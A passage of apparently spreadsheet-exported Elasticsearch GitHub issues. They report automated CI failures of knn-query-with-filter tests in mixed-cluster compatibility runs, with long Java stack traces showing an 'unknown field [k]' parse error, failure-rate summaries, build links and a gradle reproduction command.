org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\nCaused by: org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\t 64 more\n"},"status":400}]  **Issue Reasons:** - [8.x] 2 consecutive failures in step 8.14.3_bwc - [8.x] 2 consecutive failures in step 8.13.4_bwc - [8.x] 7 failures in test test {p0=search.vectors/110_knn_query_with_filter/PRE_FILTER: knn query with internal filter as pre-filter} (3.3% fail rate in 209 executions) - [8.x] 3 failures in step 8.12.2_bwc (75.0% fail rate in 4 executions) - [8.x] 2 failures in step 8.14.3_bwc (50.0% fail rate in 4 executions) - [8.x] 2 failures in step 8.13.4_bwc (50.0% fail rate in 4 executions) - [8.x] 3 failures in pipeline elasticsearch-periodic (75.0% fail rate in 4 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119805</t>
  </si>
  <si>
    <t>[CI] MixedClusterClientYamlTestSuiteIT test {p0=search.vectors/110_knn_query_with_filter/PRE_FILTER: knn query with alias filter as pre-filter} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5760 / 8.12.2_bwc](https://gradle-enterprise.elastic.co/s/2oec47ob7mlke) - [elasticsearch-periodic #5755 / 8.14.3_bwc](https://gradle-enterprise.elastic.co/s/gzd3sank5jeby) - [elasticsearch-periodic #5755 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/cznaukainsgmu) - [elasticsearch-pull-request #49316 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/2npbuwbxatkjy) - [elasticsearch-periodic #5750 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/rdgbaikkb6rsg) - [elasticsearch-periodic #5750 / 8.12.2_bwc](https://gradle-enterprise.elastic.co/s/dm53o3v7j4w3a) **Reproduction Line:**  ./gradlew ":qa:mixed-cluster:v8.12.2#mixedClusterTest" -Dtests.class="org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT" -Dtests.method="test {p0=search.vectors/110_knn_query_with_filter/POST_FILTER: knn query with filter from a parent bool query as post-filter}" -Dtests.seed=BC8F90630E5B76C9 -Dtests.bwc=true -Dtests.locale=jgo-Latn-CM -Dtests.timezone=Africa/Kampala -Druntime.java=23  **Applicable branches:** 8.x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backwards.MixedClusterClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dsearch.vectors%2F110_knn_query_with_filter%2FPRE_FILTER%3A%20knn%20query%20with%20alias%20filter%20as%20pre-filter%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [search.vectors/110_knn_query_with_filter:238]: expected [2xx] status code but api [search] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"x_content_parse_exception","reason":"[1:134] [knn] unknown field [k]","stack_trace":"org.elasticsearch.ElasticsearchException$1: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:699)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:695)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:627)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.build(RestResponse.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:140)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:111)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:443)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\nCaused by: org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\t 44 more\n"}],"type":"x_content_parse_exception","reason":"[1:138] [bool] failed to parse field [must]","caused_by":{"type":"x_content_parse_exception","reason":"[1:134] [knn] unknown field [k]","stack_trace":"org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\n"},"stack_trace":"org.elasticsearch.xcontent.XContentParseException: [1:138] [bool] failed to parse field [must]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.throwFailedToParse(ObjectParser.java:616)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:611)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat 